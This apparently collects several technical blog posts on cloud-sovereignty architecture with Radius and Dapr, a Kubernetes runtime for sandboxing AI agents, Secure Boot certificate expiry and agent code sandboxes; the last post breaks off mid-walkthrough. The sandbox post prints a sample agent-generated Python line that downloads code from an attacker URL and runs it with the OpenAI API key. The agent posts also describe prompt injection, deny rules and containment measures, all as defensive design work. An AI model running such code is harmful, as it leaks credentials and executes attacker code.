Linux and Open Source Blog articles

Designing for cloud sovereignty with Radius and Dapr

CollinBrian — Thu, 09 Jul 2026 15:53:32 GMT

In 2026, cloud sovereignty matters more than ever. It has moved from a policy discussion to an operational and architectural problem. The word “sovereignty” gets used loosely, and it can mean different things to different people. While definitions vary, in this post we define “cloud sovereignty” as the ability for an organization to retain control over where its data and compute run, which jurisdictions govern them, who operates them, and how its applications can adapt as regulatory, commercial, or operational requirements shift.

This is especially relevant for developers and platform teams building applications that need to run on hyperscaler infrastructure, such as Azure, as well as in sovereign environments. Those requirements may come from regulation, procurement policies, customer expectations, or internal risk management. In Europe, this pressure is already visible through measures such as the EU Data Act, in force since September 12, 2025, which mandates data portability and interoperability between cloud and edge data processing services. More recently, the European Commission proposed the Cloud and AI Development Act (CADA) as part of its broader European Technological Sovereignty Package. For application teams, the practical takeaway is clear: more organizations need applications that can adapt to changing deployment requirements without requiring a rewrite.

Portability is therefore a real engineering concern, not a theoretical one. If requirements change, moving a workload that is deeply integrated with provider-specific APIs can mean rewriting application code, not just reconfiguring infrastructure.

Portable applications for sovereign environments

The goal is to use the right managed service for each environment while keeping application code portable across environments. Microsoft Sovereign Cloud provides the platform foundation for digital sovereignty across sovereign public cloud, sovereign private cloud, and national partner cloud deployment models. Azure managed services provides strong platform capabilities for regulated workloads. Open source can help, especially when the same technology can be used as a managed service in one environment and self-operated in another. CADA also elevates an explicit "open source first" principle, reflecting how inspectable, portable components can reinforce resilience and reduce strategic dependency.

Even with those options, portability is not automatic - applications still need a clear architectural boundary between the capabilities they require and the infrastructure selected for each environment. This boundary is what lets organizations use the right services in each deployment model while keeping workloads adaptable as regulatory, commercial, or operational requirements change. See the diagram below:

To address building applications that are cleanly separated from their infrastructure, lets look at Radius, a CNCF project that provides a cloud native application model that addresses the boundary at the deployment layer by letting teams define applications in terms of what they need, while platform teams decide how those needs are met in each environment. For the runtime layer, lets consider Dapr, also a CNCF project which complements Radius by giving application code consistent APIs for common distributed application capabilities.

Radius: portability at the deployment layer

Radius provides a cloud-native application model. It separates the concerns of what an application needs from how those needs are met in each environment.

Resource Types define the interface that developers use to build applications. Radius ships with built-in types and supports user-defined Resource Types for an organization's own abstractions.

Recipes implement a Resource Type for a given environment. A Recipe is Infrastructure as Code; a Bicep template or a Terraform configuration that provisions infrastructure and returns the connection details. The same Resource Type can have different Recipes for different environments.

Environments bind a set of Recipes against the compute target and credentials for a given deployment context (local Kubernetes, AKS, AKS enabled by Azure Arc, or others).

Applications define the full set of resources (containers, Dapr building blocks, databases) and their relationships.

At deploy time, Radius resolves each Resource Type to the Recipe registered in the target Environment provisions the infrastructure, and captures the result in an Application Graph that developers and operators can query.

Dapr: runtime portability for Radius applications

Dapr provides building block APIs for common distributed systems concerns: state management, publish and subscribe messaging, service invocation, workflows, secrets, and more. Dapr runs as a sidecar alongside each service and exposes its APIs over HTTP or gRPC. Application code calls the Dapr API instead of the underlying technology directly, which helps keep runtime dependencies more portable across environments.

In a Radius application, Dapr building blocks such as state stores, pub/sub brokers, and secret stores can be declared as application resources. Radius binds those resources to the right infrastructure for each environment, while Dapr exposes them to the application through consistent runtime APIs.

A concrete example: order-console

The order-console sample, available in the official Radius project labs repo, demonstrates this architectural pattern end to end. It is a three-service order-management application (a Next.js frontend, an orders-api, and a fulfillment-worker) wired through Dapr state management and Dapr pub/sub. The sample ships two Radius environments:

A Kubernetes environment that provisions PostgreSQL and Apache Kafka in-cluster.

An Azure environment that provisions Azure Database for PostgreSQL Flexible Server and Azure Event Hubs in Kafka mode.

The same app.bicep deploys against both environments. Container images, Dapr component names, and application code are identical across both. Only the Recipes change. The Recipes are written in Terraform, which Radius supports as a first-class IaC option alongside Bicep.

For a step-by-step walkthrough, including the Bicep application model, the Resource Type definitions, the Terraform Recipes, and deployment instructions, see the order-console walkthrough.

Don’t let the app become the lock-in

What Radius and Dapr contribute is the application architecture layer: a way to ensure the application itself does not become the reason a workload cannot move to a more sovereign environment when requirements change. Radius Resource Types and Recipes allow platform teams to define governance requirements such as data residency, encryption standards, and audit integration as part of the platform definition. This helps ensure that workloads are deployed consistently and in line with organizational policies, regardless of the target environment. Because these requirements are abstracted from the underlying infrastructure, the same application can be deployed across public cloud, on-premises, and sovereign environments without requiring changes to the application itself.

Where a workload runs, and under which controls, becomes a deployment decision rather than a redevelopment project.

Learn more

To learn more about Radius and Dapr, explore the resources below:

Radius documentation

Radius Resource Types concept

Dapr documentation

Expanding platform engineering capabilities with Radius Resource Types

Introducing kars - an Agent Reference Stack for Kubernetes

pallakatos — Wed, 01 Jul 2026 15:35:28 GMT

kars is a Kubernetes-native runtime for AI agents on Azure. It treats every agent as untrusted code: per-pod kernel isolation, zero credentials in the agent process, end-to-end encrypted inter-agent mesh, and native consumption of the Microsoft Agent Governance Toolkit. Agents on any supported framework are governed by one set of Kubernetes policies.

This builds on the foundation Brendan Burns described last month - From open source to agentic systems: a hardened Azure Linux substrate (Azure Linux 4.0 + Azure Container Linux), an open agentic stack (Microsoft Agent Framework, AGT, A2A), and the Agentic AI Foundation. kars is a K8s-native runtime that composes these primitives into a single, deployable stack you can drop into AKS.

One set of Kubernetes policies governs every agent framework

You declare an agent's model, tools, memory, and MCP access as Kubernetes CRDs - InferencePolicy, ToolPolicy, KarsMemory, McpServer - and the per-pod router enforces them identically for every runtime, not the framework.

One policy language across OpenClaw, Hermes, LangGraph, MAF and the rest - the runtime can't bypass it.
Team A on harness A, Team B on harness B - one governance surface, one audit trail. Framework choice stops fragmenting how you govern.
Operate it from the cluster - GitOps the policies and watch the fleet in the Headlamp plugin (a Kubernetes dashboard for sandboxes, policy CRDs, and mesh topology) or the kars operator TUI.

Governing agents at scale becomes a Kubernetes problem, not an N-frameworks problem.

TL;DR

What: Kubernetes operator + per-agent inference router + end-to-end encrypted inter-agent mesh, on AKS. One sandbox per agent.
Why: an agent's real instructions are assembled at runtime from sources you don't control — model output, tool results, retrieved documents, MCP servers - and prompt injection lets any of them smuggle in hostile commands. So the agent must be treated as untrusted code that runs attacker-influenced instructions, not as trusted first-party software.
How: consumes AGT for governance, runs on the Azure Linux family, opt-in AKS Pod Sandboxing (Kata VM isolation) is one CRD field. Eight first-class agent frameworks supported.
Unique today: end-to-end encrypted inter-runtime messaging - a Python Hermes agent and a TypeScript OpenClaw agent are first-class peers on the same Signal-Protocol mesh (more runtimes landing on it); the broker sees only ciphertext. No other K8s-native agent runtime ships this.
Source: github.com/Azure/kars · MIT · contributions welcome.

Try it

# 1. Install the CLI (Node 22+)
npm install -g @kars-runtime/cli

# 2. Try it on your laptop on a kind cluster that mirrors the AKS layout.
#    kars dev prompts for the model provider.
#    Default sandbox type is OpenClaw.
kars dev --target local-k8s --release

# 3. List your agents and open the web UX with your OpenClaw dev-agent
kars list
kars connect dev-agent

# 4. Review using a CLI-based TUI operator view
kars operator

Going to production? kars up provisions the AKS cluster, controller and your first sandbox; Full path in the Quickstart guide.

The architecture, in one picture

Figure 1 - Two sandboxes running different agent runtimes (researcher on OpenClaw in enhanced isolation; writer on Hermes in confidential Kata VM isolation) talk to each other over the AgentMesh - OpenClaw and Hermes are first-class peers on one Signal-Protocol wire format, with the other adapters landing on it. The Signal session lives inside the agent processes - each agent owns its own session keys; the relay only forwards opaque ciphertext and cannot decrypt. The per-pod router holds the Entra Agent ID and the AGT governance the agent consults on every peer message (trust, capability, policy, audit). kars-sre is the cluster's own operator agent - same sandbox shape, but with cluster-wide read and gated writes. AGT is consumed for governance.

Why this design

Four convictions shaped kars. Each is opinionated; each rejects an assumption I see repeated in the agentic-AI conversation.

1. The agent is untrusted code, not a microservice.

An agent's real instructions are assembled at runtime from model output, tool responses, and content you don't control — and prompt injection turns any of them into a command. So the agent process holds no secrets, has no ambient network reach, and is isolated at the kernel, not just the network policy.

2. Delegation is a security boundary, not a function call.

When an agent delegates a sub-task, the sub-agent becomes its own sandbox - its own pod, network policy, and isolation. The agent has no cluster access; it calls one tool, the router runs a governance check, and the parent scopes the child's model, tools, egress, and token budget - so decomposition and containment are the same act.

3. Governance is the workload, not a wrapper.

Policy, audit, trust scoring, and rate limiting can't be bolted on later. kars consumes the Microsoft Agent Governance Toolkit (AGT) through stable seams from day one.

4. In-cluster messaging needs end-to-end encryption and built-in trust.

Inside the cluster, agents talk over AgentMesh: an end-to-end Signal-Protocol session where the relay routes ciphertext it can't decrypt, and peers establish trust autonomously before connecting. We speak A2A too - as the cross-organisation channel for peers outside your kars cluster. Two channels, two trust models.

Spotlight - confidential agents in one CRD field

Some agentic workloads - financial research, clinical, sovereign deployments, classified evals - need more than a hardened namespace. They need a separate kernel per workload, VM-level isolation, and a barrier between the agent and the host. kars wires this into AKS Pod Sandboxing.

What you write

apiVersion: kars.azure.com/v1alpha1
kind: KarsSandbox
metadata:
  name: financial-research
spec:
  runtime:
    kind: OpenClaw
  isolation: confidential   # standard | enhanced | confidential
  #          └─ confidential = Kata VM isolation (AKS Pod Sandboxing)

What the controller does

Sets runtimeClassName: kata-vm-isolation on the pod spec (controller/src/reconciler/mod.rs).
Adds a nodeSelector for the sandbox-kata nodepool.
Schedules onto a dedicated Kata nodepool (workloadRuntime: KataMshvVmIsolation, osSKU: AzureLinux, enableEncryptionAtHost: true) - auto-provisioned by kars up --isolation confidential or kars add <name> --isolation confidential.
Preserves all the other kars hardening (read-only rootfs, drop-ALL caps, default-deny egress, kars-strict seccomp).

What you get

A dedicated lightweight VM per pod via Kata Containers on Azure Linux, using the Microsoft Hyper-V Hypervisor with the Cloud Hypervisor VMM. Separate kernel per workload - a container escape is trapped in the VM, not the host.
Optionally, pinning the Kata nodepool to AMD SEV-SNP-capable confidential-compute VMs (Standard_DC4as_v5) adds hardware-backed memory encryption on top of the VM boundary.
A working example at examples/confidential-agent/.

The trust boundary becomes: the workload runs in its own hypervisor-isolated VM with a separate kernel; the host kernel is not in the trust set. Everything else about the agent - framework, model, policy bundle, mesh - works exactly the same. One field changes.

How kars fits the broader open agentic stack

It's a fair question, so here's the honest version: kars is a consumer and composer of the open primitives, not a competitor to them. The governance layer is the clearest example - kars doesn't reinvent policy, audit, signing, or the encrypted mesh. It plugs into Microsoft's Agent Governance Toolkit through four stable seams (mesh, policy, audit, and signing; the mesh runs on AGT's agentmesh = "4.0.0" crate), and when we hit a gap we fix it upstream rather than fork - that's what PRs #2090, #2659 and #2719 were. The Microsoft Agent Framework already runs as a first-class kars runtime, and A2A is live as an inbound gateway with an mTLS-pinned subject for cross-org traffic.

This space is young and moving fast, and a lot of good work is happening in the open - Kubernetes SIG's sigs/agent-sandbox, kagent, agentgateway. Our stance is simple: move at pace and align upstream over time. The long-term goal is genuine convergence on the shared open primitives, not a parallel stack. Underneath it all, the substrate is the Azure Linux family (ACL and AL4 distroless as they reach AKS-stable), and the plain Kubernetes baseline - Pod Security Admission, NetworkPolicy, seccomp, sidecars - is a hard requirement we never replace.

What's planned

A few things high on the near-term roadmap:

airunway support for inference provider
Azure Linux 4 based distroless images (currently based on Azure Linux 3 distroless)
Per-agent Autonomy Tiers (1..5) with default policy bundles - closes the uniform-governance failure mode.
Multi-cloud LLM providers + native guardrails (Anthropic, Bedrock, Vertex, Ollama, vLLM; Bedrock Guardrails, Model Armor, OpenAI Moderation).
Per-team virtual keys + unified action-cost ledger (model + tool + MCP + mesh + spawn) with a Grafana dashboard.
KarsKillSwitch CRD + behavioural drift detection + SLO→AGT-quarantine - one-CRD emergency pause; AGT does the actual termination.
Developer experience layer: KarsRecipe + KarsTask CRDs, browser conversation ingress, Web UI.

Come build with us

The codebase is at github.com/Azure/kars, MIT-licensed. The most useful contributions would be:

Where we want help

Testing, validation across different environments and continuous feedback
Parity across all runtime adapters and expand with additional adapters based on demand
A2A interop (the structured handshake from AgentMesh to external A2A peers).
Behavioural-drift detection over the mesh + tool-call telemetry.
Per-agent developer ingress for in-cluster chat / sessions / artifact retrieval.
OWASP Agentic AI Top 10 and NIST AI RMF mapping artifacts.
GKE / EKS deployment validation.
Security review and red-team scenarios.

Some invariants are non-negotiable

Credentials stay out of the agent process.
The inference router stays in the pod.
Inter-agent encryption remains end-to-end (the broker never enters the trust set).
AGT primitives are consumed, not duplicated.
No mocks, stubs, or TODO placeholders in production code.

Everything else is open.

If you're evaluating how to take agentic AI from pilot to production on Kubernetes, I'd value the conversation. More than that: we want to build a genuinely open community around securing AI agents - the hard problems here are bigger than any one team, and they're best solved in the open, together. Open an issue or discussion on the repository. The next 18 months of agentic AI will be decided less by model quality and more by production governance. I think the answer should be open source, K8s-native, and aligned with the upstream landscape. That's what kars is.

What IT teams need to know about Linux Secure Boot certificates expiring in 2026

bexelbie — Fri, 26 Jun 2026 00:35:08 GMT

If your organization does not use UEFI Secure Boot on Linux systems, this transition does not affect your boot path. You can stop reading now.

If you do use Secure Boot, here is what you need to know. The Microsoft Corporation UEFI CA (Certificate Authority) 2011 expires on June 27, 2026 (June 26 local time in some time zones). Expiration alone does not stop anything from booting and does not render a system insecure. Existing 2011-signed shims keep working on systems that still trust the 2011 CA. The real risk is narrower: once an operating system vendor ships a shim signed only by the Microsoft UEFI CA 2023, any system whose firmware does not already trust the 2023 CA will fail to boot. The work for you is to confirm, before that update reaches your systems, that your systems trust the 2023 CA.

If you want the history of why a Microsoft certificate sits in the Linux Secure Boot path at all, skip to the end.

Terms used in this post

You may see three Microsoft Secure Boot certificate authorities discussed in 2026 guidance. This post focuses on the Microsoft UEFI CA 2011, which is the CA used for third-party UEFI boot applications such as the Linux shim. The other expiring Microsoft Secure Boot certificates are the Microsoft Corporation KEK CA 2011, which is used to authorize updates to Secure Boot databases, and the Microsoft Windows Production PCA 2011, which is used for Windows boot components. Windows systems have a separate update path for those certificates; this post covers only the Linux boot chain.

The 2023 update also separates two uses that were both covered by the Microsoft UEFI CA 2011. The Microsoft UEFI CA 2023 is for third-party UEFI boot applications, including the Linux shim. The Microsoft Option ROM UEFI CA 2023 is for third-party option ROMs, such as firmware on some add-in cards. This post is about the Linux bootloader path, but physical systems that rely on signed option ROMs may need to check that path too.

Microsoft began returning 2023-signed Linux shim binaries to operating system vendors in October 2025, and since then a submitted shim comes back signed by both the 2011 CA and the 2023 CA. Once the 2011 CA expires, Microsoft can only sign with the 2023 CA.

In UEFI Secure Boot terminology, db is the allowed signature database, dbx is the forbidden or revoked signature database, and KEK contains keys that can authorize updates to db and dbx. SBAT is a shim ecosystem mechanism for revoking boot components by generation. SBAT is related to Secure Boot revocation, but it is separate from the CA expiration itself.

For brevity, the rest of this post uses operating system vendor to include Linux distributions and other vendors that ship and support Linux boot components. Microsoft returns signed shims to that submitting operating system vendor. It does not push shim updates to end users or IT departments. Those reach systems through the normal operating system, package, image, or platform update channels.

What is not happening

Expiration is not revocation, and it does not cause an immediate boot failure.

The 2011 CA expiring does not make existing 2011-signed shims stop booting on June 27, 2026. UEFI Secure Boot validates a signature against the trust database and revocation state, not against the certificate's validity period. The image-validation process in the UEFI specification bases the decision on whether the image's hash or signing certificate is present in the authorized database (db) and absent from the forbidden database (dbx). It does not check whether the certificate has expired. Firmware bugs are always possible, but expiration by itself should not invalidate an already-signed shim.

There is also no current plan to revoke the Microsoft UEFI CA 2011. Expiration means Microsoft can no longer sign new binaries with that certificate. Revocation would mean telling systems not to trust binaries signed with it. Revocation is not the plan.

For the same reason, do not remove the 2011 CA from a system's Secure Boot db. Removing it strips that trust path. Removal is not required for this transition, and existing boot components may still depend on the 2011 CA.

No operating system vendor has to move to a 2023-signed shim on the expiration date. An operating system vendor may keep shipping a 2011-signed shim (if one is available), ship a 2023-only shim, or ship one carrying both signatures. That decision belongs to the operating system vendor.

What can break

The failure case is a mismatch between the shim signature and the firmware trust database. The moment to worry about is not the expiration date. It is when a system first receives a 2023-only shim.

That leaves a remediation window: the time between the expiration date and the first 2023-only shim reaching a given system. How long it lasts depends on your operating system vendor's packaging decisions, any security fix that forces a new shim release, and how easily you can update firmware or VM Secure Boot state on the affected platforms.

The transition comes down to one table:

Firmware trust database	2011-only shim	2023-only shim	Dual-signed shim
2011 CA only	Boots, but depends on continued 2011 trust	Does not boot	Should boot
2023 CA only	Does not boot	Boots	Should boot
Both 2011 and 2023 CAs	Boots	Boots	Boots

The table is deliberately simple. Real systems also have dbx revocations, SBAT policy, firmware bugs, operating system vendor packaging choices, and platform-specific update paths. But this is the core compatibility problem.

Dual-signed shims help bridge the transition, because the same shim can validate through either CA. However, they are not a guarantee. Some firmware mishandles multiple signatures and evaluates only one of them, revocation and vendor support still apply, and the operating system vendor decides whether to ship and support a dual-signed shim at all.

This kind of failure happens early, before the operating system loads. Recovery means restoring a trusted boot path or following your operating system, hardware, or platform vendor's recovery guidance. It is not a package rollback inside a running system.

Who should pay closest attention

This transition matters most where the operating system, firmware, and update path may not move together. If you run a maintained operating system on maintained hardware or a maintained virtualization platform, the normal vendor update path may handle most of it. Closer attention is worthwhile where that path is missing, delayed, customized, or hard to validate.

Older hardware is the first case. Some systems need a firmware update before they can trust the 2023 CA, and support can vary by model even within one hardware vendor's portfolio. Check each model you operate rather than assuming one answer covers the fleet.

Long-lived virtual machines are the second. VM firmware is still firmware. A VM's Secure Boot state depends on when it was created, which platform firmware it uses, and which UEFI variables have changed since. Firmware is not just another package update, so a long-lived VM may never have received the relevant firmware or database updates unless the administrator or platform applied them. Your cloud or virtualization provider should be able to say how the 2023 CA is handled for new VMs, existing VMs, and imported or custom images. For Azure Trusted Launch and Confidential VMs specifically, Microsoft has published guidance on identifying and updating affected instances.

Older operating system releases need more careful validation. Some lack current Secure Boot tooling, current fwupd daemon behavior, or a supported path for updating UEFI trust databases. A command that works on one release may not be supported on another.

Custom fleets are their own category: systems built from custom images, frozen package mirrors, pinned bootloader versions, or local Secure Boot policy changes. The more an environment differs from the vendor's default update path, the more you need to verify the actual firmware trust database and installed shim directly.

Smaller operating system vendors and long-tail distributions are worth checking too, especially if they submit shim updates infrequently or have not finished their 2023 signing transition. No single authoritative public list tells you which releases have completed this work.

Who is responsible for what

There is no single Linux Secure Boot owner who can make every system safe for the transition.

The operating system vendor controls which shim and boot components it ships. It also controls whether its update process checks the firmware trust database before installing a 2023-only shim.

The Linux community runs a community-driven shim-review process for shim submissions. That process is the primary review gate before an operating system vendor requests a Microsoft signature. It is not a support channel for individual systems or fleets.

The hardware vendor, firmware vendor, or virtual machine platform controls which trust anchors are present by default and how firmware updates are delivered. In a physical machine, that may mean a BIOS or firmware update. In a VM, it may mean platform firmware defaults, guest-visible UEFI variables, or a provider-specific remediation process.

Microsoft controls the Microsoft UEFI signing service and the Microsoft UEFI CAs. After shim-review approval, Microsoft verifies the submitter's relationship to the operating system vendor, runs some additional checks, signs submitted shims, and returns the signed artifacts to the submitting operating system vendor. Microsoft does not choose when each operating system vendor ships a new shim to its customers.

Your organization controls the systems it administers. In practice, that means checking whether Secure Boot is enabled, checking which certificates are trusted, following guidance from the relevant operating system vendor, and following guidance from the hardware vendor or VM provider.

This is why the right answer for any specific system depends on its operating system vendor, hardware vendor, and platform. This post explains the model. Only those vendors can tell you what is supported for your systems.

What to check

The exact commands vary by operating system vendor, package set, and platform. Treat the examples below as illustrations, not guaranteed instructions for every Linux system. IT departments should validate commands against vendor documentation before using them in production automation.

At fleet scale, the useful starting point is an inventory rather than a one-time manual check. Useful fields include whether Secure Boot is enabled, which Microsoft UEFI CAs are present in the firmware trust database, which CA signed the installed shim, the operating system release, the hardware model or VM platform, the update channel, and whether the system comes from a custom image or vendor image.

Set up representative canary systems before any broad rollout. A canary set should cover the differences that matter in your fleet: hardware model, VM platform, operating system release, image lineage, and update channel. The aim is to avoid discovering a firmware or shim mismatch for the first time during a broad production update, not to build a new certification program.

First, check whether Secure Boot is enabled:

sudo mokutil --sb-state

If Secure Boot is disabled, this certificate transition does not affect that system's current boot path.

Next, check which Microsoft UEFI CAs are in the firmware trust database:

sudo mokutil --db

Look for entries such as:

Microsoft Corporation UEFI CA 2011
Microsoft UEFI CA 2023

If both are present, the system is prepared for a future 2023-signed shim. If only the 2011 CA is present, check guidance from the relevant operating system vendor and platform provider before accepting a 2023-only shim update.

On physical systems, also check whether the platform relies on signed third-party option ROMs. Those may require the Microsoft Option ROM UEFI CA 2023 in addition to the Microsoft UEFI CA 2023 used for boot applications. This is another reason hardware guidance can vary by model.

Administrators can also inspect the signature on the shim currently installed on a system. On Enterprise Linux and related distributions, pesign is often used:


sudo dnf install pesign
sudo pesign -S -i /boot/efi/EFI/<vendor-or-distribution>/shimx64.efi

On Debian, Ubuntu, and related distributions, sbverify from sbsigntools is often used:


sudo apt install sbsigntools
sudo sbverify --list /boot/efi/EFI/<vendor-or-distribution>/shimx64.efi

The path to shim may differ. Some systems use a different EFI path, a different architecture suffix, or a different bootloader arrangement. Vendor documentation is the right source for exact commands.

How updates may be delivered

Many operating system vendors use the Linux Vendor Firmware Service (LVFS) and fwupd for firmware-related updates, including some UEFI Secure Boot database updates. Not every vendor enables the same tooling, and not every platform supports the same update mechanism.

Common examples include:


sudo fwupdmgr update
sudo fwupdmgr security
sudo fwupdmgr get-devices

Some systems may require a firmware update from the hardware vendor. Some may support a standalone UEFI database update. Some may not support a safe standalone update at all. Some hardware and firmware vendors block standalone database updates because earlier failures showed that the update could break systems.

Updating the Secure Boot allowed signature database (db) also depends on authorization from keys in KEK. That is one reason these updates often require cooperation from the firmware, hardware, or VM platform vendor. Administrators should not assume that possession of a certificate file is enough to update a system safely.

Do not force a Secure Boot database update just because a command exists. Follow the guidance for the specific hardware, VM platform, or operating system vendor. Forcing an update can force a physical reboot of a machine or destroy the system.

After the first inventory pass, keep watching the operating system vendor's security advisories and bootloader package updates.

Questions for your vendors

The right questions depend on the system, but these are the kinds of answers IT departments should look for from operating system vendors, hardware vendors, and VM providers:

Does this operating system release currently ship a 2011-signed, 2023-signed, or dual-signed shim?
If the vendor plans to ship a 2023-only shim, will the update process check whether the system trusts the 2023 CA before installing it?
How is the Microsoft UEFI CA 2023 delivered for this hardware model, VM platform, or image?
Is a standalone Secure Boot database update supported, or must the update arrive through a firmware update?
Does support vary by hardware model, firmware version, VM generation, image type, or operating system release?
What should administrators monitor for shim, GRUB, SBAT, db, KEK, or dbx updates related to this transition?
What is the recommended validation path before broad deployment?
What is the supported recovery path if a system receives an incompatible shim or firmware update and fails to boot?

What to do now

If an IT department administers Linux systems that use Secure Boot, the useful work is straightforward:

Use the checks above to inventory Secure Boot state, trusted CAs, and installed shim signatures across representative systems.
Identify the parts of the fleet most likely to diverge from default vendor paths, including older hardware, long-lived VMs, older operating system releases, custom images, and pinned bootloader packages.
Read operating system, hardware, and VM provider guidance before accepting 2023-only shim updates or applying firmware and Secure Boot database updates.
Test representative canary systems before rolling out shim or firmware changes broadly.
Monitor operating system vendor advisories for shim and bootloader updates related to the transition.
Avoid forcing low-level firmware or UEFI variable updates unless vendor guidance says to do so.

How Linux got here

UEFI Secure Boot was introduced to let firmware verify boot components before executing them. The firmware contains a trust database. If a bootloader is signed by a trusted certificate and is not blocked by revocation policy, the firmware can execute it.

In the PC ecosystem, Microsoft has long operated the signing infrastructure used by Windows and by many third-party UEFI boot components. Linux operating system vendors do not have Microsoft sign the Linux kernel directly. Instead, they use a small first-stage bootloader called shim.

The Linux shim is signed by Microsoft so firmware will start it. The shim then validates the next boot component, usually GRUB or another vendor-controlled bootloader, using keys controlled by the operating system vendor, not Microsoft. That structure lets Linux operating system vendors participate in the UEFI Secure Boot ecosystem while keeping control over their own boot chains.

The shim code is developed publicly, and shim signing uses the community-run shim-review process before the Microsoft signing step. That split is important. The Linux community reviews shim submissions, and Microsoft operates the signing service that applies a signature firmware will trust.

The certificate rotation affects this first handoff. Firmware must trust the CA that signed shim. If a future shim is signed only by the 2023 CA, the firmware needs the 2023 CA in its trust database.

A system that keeps booting with a 2011-signed shim is not automatically broken or insecure on the expiration date. A system that moves to a 2023-signed shim needs to trust the 2023 CA; plan for that transition.

Govern AI Agents Using Agent Governance Toolkit and Azure Container App Sandboxes

amolravande — Fri, 05 Jun 2026 22:40:19 GMT

When you let a model generate code and you actually execute it, you are handing the model a Python REPL on whatever machine runs the agent. That sounds alarmist — right up until a planner (yours, mine, or anyone else's) produces a snippet that reads as harmless on the first pass:

# "summarize the changelog" import urllib.request, os data = urllib.request.urlopen( "https://gist.githubusercontent.com/attacker/.../raw" ).read() exec(data, {"OPENAI_API_KEY": os.environ["OPENAI_API_KEY"]})

Two lines of mostly-stdlib Python. If it runs in your application process, the model just decided it could pull arbitrary code off the internet and pass your secrets into it. Today that's a hypothetical; tomorrow it's a postmortem.

The defense splits into two questions developers can actually answer:

Where does the code run? Not in your process. A sandbox — a separate, disposable execution environment with its own CPU, memory, filesystem and network — gives you a hard boundary so a bad snippet can crash itself, not your service. Sandboxes have shipped in many flavors (containers, micro-VMs, wasm); the new one in this post is Azure Container Apps sandbox, where each agent session gets a managed, per-session container with a fail-closed egress proxy in front, scaled and operated by Azure.
What is the code allowed to do? A sandbox alone is a wide playing field — an attacker who wins a sandbox still has the whole sandbox. Policy narrows the field. A single YAML PolicyDocument says: these tools, these hosts, these CPU / memory / time budgets, no subprocess, no pip install, no substring match on OPENAI_API_KEY. The first cut is enforced on the host by AGT policy (deny rules, tool allowlist, AST scan) so denied snippets never even leave your process; the network cut is enforced inside the ACA sandbox by the egress allowlist so an outbound call to a non-allowed host fails closed at the proxy. Same document, two layers, no drift.

AGT ships a Python package — agt-sandbox — that answers both, and a recently added sandbox provider that was recently announced in Build 2026 - Azure container app sandboxes. The rest of this post walks through what's in the agt-sandbox package, the abstraction it pivots on, the new ACA provider, how it composes with AGT policy, and a full LLM-planned research agent built on top.

1. What is Azure Container Apps sandbox?

Azure Container Apps Sandboxes (public preview, June 2, 2026) are a first-class Azure resource — Microsoft.App/SandboxGroups — purpose-built for running untrusted, agent-generated code. Each sandbox runs in its own hardware-isolated microVM, boots in sub-second time from an OCI disk image, and can suspend/resume from full memory + disk snapshots for scale-to-zero economics on stateful compute. It's the same primitive that powers Cloud sandboxes in GitHub Copilot, Foundry Hosted Agents, and ACA Express.

See - https://techcommunity.microsoft.com/blog/appsonazureblog/introducing-azure-container-apps-sandboxes-secure-infrastructure-for-agentic-wor/4524131 for more info on the service

If you've used ACA Dynamic Sessions, Sandboxes are the next evolution and where new work should target.

2. What's in the agt-sandbox package

agt-sandbox (PyPI: agt-sandbox, import name: agent_sandbox) is the execution-isolation layer of AGT. It is intentionally small. Its job is to take a snippet of agent- generated code and run it somewhere that is not your application process — under policy, with a structured result.

The package contains:

SandboxProvider — the abstract base class every backend implements (next section).
Three built-in providers, each gated behind an install extra so you only pull what you need:
- DockerSandboxProvider — hardened OCI containers, with an optional auto-upgrade to gVisor or Kata when present (pip install "agt-sandbox[docker]").
- HyperLightSandboxProvider — sub-millisecond Hyperlight micro-VMs over KVM / mshv / WHP (pip install "agt-sandbox[hyperlight]").
- ACASandboxProvider — Azure Container Apps managed sandbox sessions (pip install "agt-sandbox[azure]"); the focus of this post.
Shared dataclasses — SandboxConfig, SandboxResult, SessionHandle, ExecutionHandle, plus SessionStatus / ExecutionStatus enums. Every provider returns these same types, so calling code never special-cases the backend.
Policy-projection helpers — small per-provider functions (docker_config_from_policy, aca_config_from_policy, …) that translate the AGT PolicyDocument into provider-native settings (CPU / memory caps, egress rules, env vars).

3. The SandboxProvider ABC

SandboxProvider is the contract every backend implements. The abstract surface is deliberately minimal:

class SandboxProvider(ABC): @abstractmethod def create_session(self, agent_id, policy=None, config=None) -> SessionHandle: ... @abstractmethod def execute_code(self, agent_id, session_id, code, *, context=None) -> ExecutionHandle: ... @abstractmethod def destroy_session(self, agent_id, session_id) -> None: ... @abstractmethod def is_available(self) -> bool: ...

Every method has an *_async variant that delegates to the sync implementation through asyncio.to_thread by default, so an async agent can call await provider.execute_code_async(...) without each provider having to ship its own event-loop story.

The contract features four things, and writing against the ABC means you get all of them no matter which backend is plugged in:

Feature	What it means
Per-session isolation	One (agent_id, session_id) pair maps to exactly one sandbox; concurrent agents do not share state
Policy as a first-class argument	create_session accepts a PolicyDocument; the provider projects it onto its native primitives
Host-side PolicyEvaluator gate	Every execute_code call runs the evaluator before dispatching code; denied calls never touch the backend
Structured SandboxResult	Same success / exit_code / stdout / stderr / killed / kill_reason / duration_seconds shape from all backends

Per-session isolation is the right unit of granularity because a session is also the natural unit for blast radius and identity: within one session the agent's working state survives across execute_code calls (same (agent_id, session_id) → same sandbox in the provider's cache), and when the session is destroyed the sandbox is deleted with it. Different sessions get different sandboxes — create_session always provisions a fresh one and returns a new session_id, so there is no in-process pathway for state to flow from one session to the next.

The hard isolation between two live sandboxes — that a compromised session cannot read another session's filesystem, memory, or network — is ultimately an Azure platform guarantee about inter-sandbox isolation within a sandbox group, not something AGT itself enforces. The provider is a thin lifecycle driver.

The abstraction matters in practice because the same agent code works on every backend. You write your planner against SandboxProvider and you choose Docker, Hyperlight for local sandboxes and ACA for managed cloud sandboxes — by swapping one constructor:

4. The new ACASandboxProvider

ACASandboxProvider is the most recent addition in AGT. It drives the early-access azure-containerapps-sandbox Python SDK so an agent step can run in a managed Azure-side container without any of the usual infrastructure plumbing.

Under the hood, ACASandboxProvider wires the three SandboxProvider lifecycle methods straight onto the ACA SDK. Here's what each one actually does for you:

create_session(agent_id, policy=None, config=None) — provisions a fresh ACA sandbox for the agent and applies the policy's resource caps and egress allowlist. Returns a SessionHandle.

execute_code(agent_id, session_id, code, *, context=None) — runs host-side policy checks, then executes the snippet inside the sandbox. A policy denial raises PermissionError. Returns an ExecutionHandle carrying a SandboxResult.

destroy_session(agent_id, session_id) — deletes the underlying ACA sandbox and evicts cached state. Returns None.

The lifecycle in code looks like this:

